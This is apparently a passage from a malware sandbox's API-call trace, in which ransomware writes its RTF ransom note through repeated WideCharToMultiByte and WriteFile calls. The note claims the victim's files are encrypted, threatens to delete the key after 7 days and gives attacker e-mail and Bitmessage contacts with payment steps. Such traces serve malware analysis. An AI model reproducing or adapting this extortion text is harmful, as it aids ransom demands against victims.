ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.357] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.357] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef9408, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nJ\x8eú\x10\x11\x13\x15ÔÒÅ3'g\x18ÂÉ=)ͪõ}Ó\x14", lpUsedDefaultChar=0x0) returned 8717 [0273.357] WriteFile (in: hFile=0x294, lpBuffer=0x1ef9408*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef9408*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, 